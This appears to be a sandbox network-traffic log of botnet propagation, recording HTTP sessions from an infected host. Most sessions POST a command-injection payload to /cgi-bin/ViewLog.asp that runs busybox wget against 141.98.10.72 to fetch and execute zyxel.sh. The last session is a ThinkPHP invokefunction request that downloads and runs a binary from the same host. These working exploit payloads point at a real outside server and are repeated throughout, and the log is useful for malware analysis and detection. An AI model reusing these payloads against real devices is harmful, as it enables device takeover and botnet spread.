                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      842192.168.2.155616895.47.122.2108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.742276907 CET380INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 09:30:12 GMT
                                                      Connection: close
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Cache-Control: post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      843192.168.2.155830245.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:46.870306015 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:46Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      844192.168.2.155432262.29.7.538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.033832073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      845192.168.2.155831245.201.246.17723
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.369323015 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: .
                                                      Feb 14, 2024 09:30:47.918256998 CET179INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      846192.168.2.155844431.136.126.958080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.503274918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.183823109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:49.527859926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:52.311839104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687807083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.439325094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:30.454646111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:13.461453915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      847192.168.2.155434231.136.75.2408080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.503422022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.183810949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:49.527869940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:52.311832905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687798023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:08.439311028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:30.454766989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:13.461432934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      848192.168.2.153779295.43.115.1638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.510653019 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.740364075 CET381INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 09:44:19 GMT
                                                      Server: web
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      849192.168.2.154808485.31.62.408080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.515678883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.750081062 CET405INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:47 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 248
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      850192.168.2.153597631.130.205.128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.523540974 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:47.765861988 CET158INHTTP/1.1 404 Not Found
                                                      Content-Type: text/plain
                                                      Date: Wed, 14 Feb 2024 08:30:47 GMT
                                                      Content-Length: 18
                                                      Connection: close
                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                      Data Ascii: 404 page not found


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      851192.168.2.155885894.122.194.2178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.529228926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      852192.168.2.153579262.60.172.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:47.788538933 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:49.239785910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      853192.168.2.154787695.100.179.11480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:48.091960907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
